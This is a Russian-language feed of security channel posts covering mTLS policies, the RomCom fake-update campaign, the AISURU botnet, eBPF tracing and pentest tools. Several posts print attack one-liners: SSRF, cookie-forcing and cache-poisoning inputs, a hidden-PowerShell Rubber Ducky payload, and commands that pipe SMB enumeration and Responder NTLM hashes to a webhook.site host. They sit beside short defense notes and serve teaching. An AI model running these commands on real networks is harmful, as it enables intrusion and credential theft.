Service Mesh и mTLS: что реально защищает, а что - нет

👋 Приветствую в мире цифровой безопасности!

Сегодня разберёмся, как работает безопасность в Service Mesh и почему mTLS часто понимают не так.

⏺Что делает mTLS на самом деле: Он шифрует трафик между сервисами и проверяет, что с вами общается именно тот сервис, за кого он себя выдаёт. То есть защищает канал связи и подтверждает «кто есть кто». Но! На этом защита заканчивается. mTLS не проверяет, что сервис имеет право запрашивать конкретные данные. Это очень частое заблуждение.

⏺Где возникает миф: Команда ставит Istio или Linkerd, включает mTLS - и думает, что теперь «всё в Mesh под защитой». На деле:

➡️ если злоумышленник взломал один под — он получает уже расшифрованный трафик,
➡️ Envoy-сертификаты лежат в памяти sidecar,
➡️ сеть шифруется, но внутренние разрешения не контролируются.

⏺mTLS ≠ полноценный zero trust: Mesh проверяет «кто ты», но не проверяет «что тебе можно». Чтобы это заработало, нужны политики доступа.

Вот пример двух ключевых настроек:

# Включаем строгий mTLS (обязательное шифрование)
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: strict
spec:
  mtls:
    mode: STRICT

# Разрешаем к сервису B обращаться только сервису A
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: limit-b
spec:
  selector:
    matchLabels:
      app: service-b
  rules:
    - from:
        - source:
            principals: ["cluster.local/ns/default/sa/service-a"]

⏺В итоге: mTLS - нужная и важная часть защиты, но он отвечает только за безопасный канал. Настоящая безопасность появляется, когда поверх него добавляют:

• политики кто к кому может ходить,
• изоляцию подов,
• правила авторизации на уровне действий.

ZeroDay | #mTLS

RomCom атакует через фейковые обновления браузера

👋 Приветствую в мире цифровой безопасности!

Расскажу про свежую цепочку атаки, где RomCom впервые использовал SocGholish (FakeUpdates), чтобы доставить Mythic Agent, и всё под видом обновления браузера.

⏺Что произошло: SocGholish - тот самый «фейковый апдейтер» Chrome/Firefox, который показывают на взломанных сайтах. Жертва видит «обновите браузер», скачивает скрипт, и цепочка запускается.

⏺Обычно этот загрузчик работает с группами вроде Evil Corp или LockBit, но впервые замечено, что он доставил RomCom-перегрузчик.

⏺Как шла атака: вредоносный JS разворачивает reverse shell к C2, позволяет выполнять команды, тянет Python-бэкдор VIPERTUNNEL, а затем - DLL-лоадер RomCom, который подгружает Mythic Agent (постэксплуатация: команды, файловые операции, управление). От клика по «обновить браузер» до доставки полезной нагрузки меньше 30 минут.

⏺Контекст: RomCom (Storm-0978 / Void Rabisu) связан с российской группировкой GRU Unit 29155 и активно работает по узким, заранее определённым целям. Здесь целью стала американская инжиниринговая компания.

⏺Что интересно: полезная нагрузка доставляется только если домен Active Directory совпадает с нужным значением - атака точечная, не массовая. В этом инциденте цепочку удалось остановить.

ZeroDay | #история

LaLiga устроила интернет‑хаос: как борьба с пиратством положила пол‑Испании

👋 Приветствую в мире цифровой безопасности!

Расскажу, как борьба Ла Лиги с пиратскими стримами превратилась в один из самых громких сетевых фейлов 2025 года.

⏺Как всё началось: у лиги было судебное разрешение на «динамические блокировки», можно мгновенно резать IP, с которых идут пиратские трансляции. Идея понятная, но исполнение… чуть менее.

⏺Вместо точечных блоков LaLiga начала гасить целые диапазоны, включая адреса Cloudflare. В итоге люди просто открывали сайты — а те не работали. Никакого пиратства, просто побочный урон.

⏺Что происходило в сети: под нож попадали CDN‑IP, за которыми сидят сотни легальных сайтов. Блокируют один IP - исчезают интернет‑магазины, новостные порталы, чьи‑то рабочие сервисы.

⏺Провайдеры действовали формально: есть предписание - блокируем. А тонких механизмов фильтрации в инфраструктуре просто нет.

⏺Масштаб бедствия: к лету заблокированы миллионы IP. Юзеры массово писали в поддержку провайдеров, VPN‑трафик улетел вверх, а Cloudflare уже официально жаловалась США на «вред третьим странам». LaLiga же стояла на своём: «боремся с пиратством, всё законно».

⏺Что можно было сделать: проблема не в борьбе с пиратами, а в выбранном инструменте. IP‑блокировки в 2025 году - это как выключить рубильник в доме, чтобы погасить лампочку… Вместо этого можно использовать SNI‑фильтрацию, L7‑анализ или точечные судебные ордера на конкретные хосты, а не на сетевые диапазоны.

ZeroDay | #история

Чтобы тебя не вычислили рекламщики: почему приватность - это паранойя

Даже если убрать куки, уйти от Google и включить VPN - рекламные сети всё равно могут узнать тебя по браузерному фингерпринту. Canvas‑рендеринг, шрифты, расширения, размер окна, язык системы - всё это складывается в уникальный «паспорт», по которому тебя находят снова и снова.

⏺В статье о том, как именно собирают эти отпечатки, почему банальные меры защиты почти не работают, и какие браузеры вроде Brave или Mullvad реально умеют снижать отслеживание. В 2025‑м, чтобы остаться незаметным, мало просто спрятаться, приходится думать как параноик.

ZeroDay | #Статья

Infection Monkey: "безопасный червь", который проверяет вашу сеть лучше пентеста

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺Infection Monkey - это открытая платформа для adversary emulation, которая имитирует поведение реального malware: распространяется по сети, подбирает логины, использует уязвимости, ворует креды и отправляет отчёт на C2-сервер Monkey Island.

⏺Monkey комбинирует техники lateral movement и реальные эксплойты: Log4Shell, RDP, SSH, SMB, WMI, слабые пароли и даже Mimikatz.

⏺Логика простая: запускаете «ослабленный вирус», смотрите, куда он смог проникнуть, и укрепляете защиту там, где она дала сбой. Это как вакцина: безопасный патоген помогает выстроить иммунитет сети.

⏺Установка и запуск:

# Клонируем проект
git clone https://github.com/guardicore/monkey
cd monkey

# Установка зависимостей (пример для Python-части)
pip install -r requirements.txt

# Запуск Monkey Island (C2-сервер)
docker run -p 5000:5000 guardicore/monkey-island

# Старт Infection Monkey агента
./infection_monkey --auto

# Запуск юнит-тестов
pytest

# Покрытие кода
pytest --cov-report=html --cov .

ZeroDay | #Инструмент

Мониторинг Linux на уровне ядра: понятное введение в eBPF + Cilium

👋 Приветствую в мире цифровой безопасности!

Давай разберёмся, как вообще смотреть «внутрь ядра» без написания громоздких kernel-модулей. eBPF как раз про это: маленькие программы, которые запускаются внутри ядра через встроенную виртуальную машину

⏺Вспомним, что такое eBPF: это способ перехватывать системные события (syscalls, сетевые пакеты, функции ядра), анализировать их и отправлять данные обратно в юзерспейс. Под это есть разные крючки: tracepoints, kprobes/kretprobes, uprobes и карты (maps) для обмена данными.

⏺А теперь перехватим execve на Go через Cilium eBPF

1️⃣Создаём проект:

mkdir execve-tracer && cd execve-tracer
go mod init execve-tracer
sudo apt install clang llvm libbpf-dev
go get -t github.com/cilium/ebpf/cmd/bpf2go

2️⃣Пишем BPF-программу, которая ловит вызов execve и отправляет PID, имя процесса и запускаемый файл. Она цепляется к tracepoint:

SEC("tp/syscalls/sys_enter_execve")
int monitor_execve(struct syscalls_enter_execve_args* ctx) {
    struct event evt = {};
    evt.pid = bpf_get_current_pid_tgid() >> 32;
    bpf_get_current_comm(evt.comm, sizeof(evt.comm));
    bpf_probe_read_user_str(evt.filename, sizeof(evt.filename), ctx->filename);
    bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &evt, sizeof(evt));
    return 0;
}

3️⃣Go-часть: подключаемся к tracepoint, читаем события из perf-буфера и выводим в консоль:

go generate
go build -o tracer
sudo ./tracer

После запуска вы увидите каждый процесс, который выполняет execve - от bash до systemd-сервисов.

ZeroDay | #EBPF

Как не отправить деньги «не туда»

👋 Приветствую в мире цифровой безопасности!

Если вы хоть раз пересылали кому‑то номер для перевода - вы уже попадали в зону риска.

⏺А попали вы не потому, что банки небезопасные. А потому, что главный разрыв происходит между людьми, когда реквизиты гуляют по мессенджерам.

⏺Что реально ломается: мессенджер можно обмануть. Сообщение редактируют, номер подменяют, пересылают старый, делают фишинговую визитку, а предпросмотр ссылки могут перехватить. И всё, вы переводите деньги не тому, кому хотели. Это не атаки на СБП или банк. Это атаки «по дороге» - до того, как вы вообще открыли приложение.

⏺Почему «просто номер» не всегда безопасно: номер - это просто цифры без защиты и без проверки. Вы никак не узнаете, что тот самый реквизит, который вы вставили, настоящий, а не подменённый кем‑то в чате или в буфере обмена.

⏺Как решают проблему: защитная фраза. Отправитель создаёт свою короткую фразу, и она показывается на каждой визитке, которую он открывает. Фраза хранится на стороне отправителя, поэтому подделать её невозможно - даже если кто‑то подсунул фейковую ссылку, визитка просто не покажет нужный маркер.

⏺Что это даёт: вы сразу понимаете, что визитка настоящая, реквизит правильный, а путь до банка не был подменён. Фишинг, ошибки и MITM‑подмены - сильно сложнее или полностью невозможны. Деньги по‑прежнему идут напрямую через банк, сервис их даже не видит.

ZeroDay | #фишинг

ХАКСЕТ .labs: практичная площадка для первых шагов в пентесте

👋 Приветствую в мире цифровой безопасности!

Ещё один инструмент, который может пригодиться тем, кто только начинает разбираться в ИБ.

⏺ Вход с нулём знаний: задачи идут от самых простых, чтобы понять базовую механику

⏺ Внутри уже 25 задач: каждая задача сопровождается видеоразбором

⏺ Живое комьюнити: где можно уточнить непонятные моменты или обсудить решение

⏺ Можно выкладывать свои задачи: это приятный бонус для тех, кто уже что-то умеет. Платформа растёт за счёт самих пользователей

ZeroDay | #Инструмент

3 приёма для веб‑пентеста

👋 Приветствую в мире цифровой безопасности!

Расскажу сегодня о трех полезных фишках именно для веб-пентеста.

⏺Blind SSRF через favicon-hash: Подмена пути на /favicon.ico с редиректом на ваш сервер. Многие прокси разрешают favicon без проверки домена.
Если хэш favicon меняется, значит и SSRF-трафик точно дошёл до вас.

GET /favicon.ico HTTP/1.1
Host: internal.service

➡️Защита: строгие allowlist доменов, отключение «favicon fallback».

⏺Cookie-forcing через незаполненные поддомены: Если у домена есть a.example.com, но нет b.example.com, вы можете поднять свой b. и выставить cookies на весь .example.com.
При следующем запросе браузер отправит ваши куки в реальное приложение, а это часто ломает auth‑логику.

Set-Cookie: session=evil; Domain=.example.com

➡️Защита: запрет wildcard‑cookie, политика Host-Only, закрытие неиспользуемых поддоменов.

⏺Cache-Poisoning через хитрый параметр: Многие CDN кэшируют URL вроде:
/api/user?nocache=1&x=
Если добавить пустой параметр или нестандартный разделитель (;, %00), CDN кэширует вашу версию ответа, а пользователь получает поддельный контент.

/api/user?nocache=1&x=%00inject

➡️Защита: нормализация URL, запрет необычных разделителей, строгая политика кэширования.

ZeroDay | #пентест

Как ИИ-сервисы обращаются с вашими данными в 2025 году

2025-й стал годом, когда политики обработки данных у ИИ-сервисов резко поменялись. Судебное решение против OpenAI, крупные утечки вроде более миллиона записей DeepSeek и новые требования к хранению данных, всё это заставило пересмотреть представление о том, что именно происходит с запросами, которые мы отправляем в модели.

⏺В статье очень подробный разбор, как разные вендоры (OpenAI, Anthropic, Google, DeepSeek, GigaChat, YandexGPT, OpenRouter и инструменты для кодинга) хранят данные, используют ли их для обучения, чем отличаются пользовательские и корпоративные режимы и какие были реальные инциденты в 2025 году.

ZeroDay | #Статья

USB Rubber Ducky: библиотека полезных пейлоадов

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

⏺USB Rubber Ducky - это флешка, которая притворяется клавиатурой.
Вы вставляете её в ПК, и она мгновенно начинает вводить команды с нереальной скоростью. А официальный репозиторий usbrubberducky-payloads - это огромная библиотека готовых DuckyScript‑пейлоадов: от быстрого recon до автоматизации рутинных задач.

⏺Пейлоады пишутся на DuckyScript 3.0: теперь это полноценный мини‑язык с функциями, циклами, режимами HID/Storage, рандомизацией, OS‑детекцией и расширениями.

⏺Работать удобнее всего через PayloadStudio - это веб‑IDE с автокомплитом, встроенными расширениями и компиляцией в inject.bin. Написал payload.txt → собрал → вставил «утку» → получил автоматизацию уровня «вставил и ушёл».

⏺Пример минимального пейлоада (авто‑recon):

DELAY 500
GUI r
STRING powershell -nop -w hidden
ENTER
DELAY 700
STRING whoami; ipconfig; systeminfo | Out-File C:\recon.txt
ENTER

Компиляция и загрузка

# Собрать payload через PayloadStudio
# Файл inject.bin скопировать в корень "утки"

Структура репозитория

payloads/
  ├── recon/
  ├── exfiltration/
  ├── remote_access/
  └── privesc/
languages/
extensions/

ZeroDay | #Инструмент

📝 Наглядно системная иерархия в Linux

ZeroDay | #Linux

Супероружие, которое взорвет интернет - ботнет AISURU

👋 Приветствую в мире цифровой безопасности!

Расскажу, почему AISURU стал настолько серьезным ботнетрм и чем он отличается от классических IoT‑ботнетов.

⏺AISURU вырос с ~6 до ~30 Tbps за месяцы. Это уже полноценный инфраструктурный ботнет, который способен давить даже сетевые магистрали и CDN. Мощность у него распределена по тысячам подсетей, поэтому трафик выглядит как нормальный глобальный шум, что усложняет фильтрацию 😬

⏺Рост обеспечен автоматизированной цепочкой заражений: а именно сбор свежих CVE для SOHO‑роутеров, массовые сканеры, точечная эксплуатация и самораспространение. Ботнет ставит агента поверх уязвимого фреймворка, убирает конкурентов, закрепляется в системе и сразу встраивается в общую командно‑управляющую сеть.

⏺Внутри команды есть чёткое разделение: одни занимаются поиском багов, другие — созданием эксплойтов под новые модели оборудования, третьи - построением прокси‑цепочек и инфраструктуры управления. За счёт этого AISURU стабильно пополняет «флот» и быстро адаптируется под патчи производителей.

⏺Технологически ботнет еще как отличается от обычных Mirai‑форков: у него есть продвинутое обнаружение honeypot‑ловушек, динамическое переключение IP‑пула, методы обхода фильтрации, а также авто‑тюнинг под конкретный DDoS‑вектор (UDP‑flood, TCP‑flood, amplification‑варианты).

⏺Текущие цели ботнета такие: игровые платформы, облачные провайдеры, телеком‑операторы, крупные SaaS‑сервисы. Главное отличие AISURU - он продаётся как услуга, поэтому характер атак постоянно меняется: оператор подстраивает сценарий под защиту конкретной жертвы, что увеличивает эффект от атак.

ZeroDay | #история

3 лайфхака для веб-пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте сетевых протоколов и Wi-Fi и защите от них.

⏺Быстрое перечисление SMB-шар без кредов + отправка результатов на webhook: собирает пользователей, шары и политики, логирует удаленно.

crackmapexec smb target.example.com –shares –users –pass-pol | curl -s -X POST https://webhook.site/your-id –data-binary @-

⏺Wi-Fi deauth-атака с подтверждением через webhook: отключает клиентов от AP, пинг на webhook подтверждает успех (клиент reconnect’ится и триггерит).

airodump-ng wlan0mon # найди BSSID и клиент aireplay-ng -0 10 -a BSSID -c CLIENT_MAC wlan0mon && curl -s https://webhook.site/your-id -d “deauth_success=$(date)”

⏺LLMNR/NBT-NS poisoning с захватом хэшей + webhook-лог: отравляем запросы в сети, ловим NTLM-хэши и сразу шлем на webhook для оффлайн-кракинга.

responder -I eth0 -v | grep “NTLMv2” | curl -s -X POST https://webhook.site/your-id –data-binary @-

➡️Защита: отключить SMBv1/guest, мониторить 445/139, использовать WPA3 + PMF, отключить LLMNR/NBT-NS/mDNS, предпочитать unicast DNS.

ZeroDay | #пентест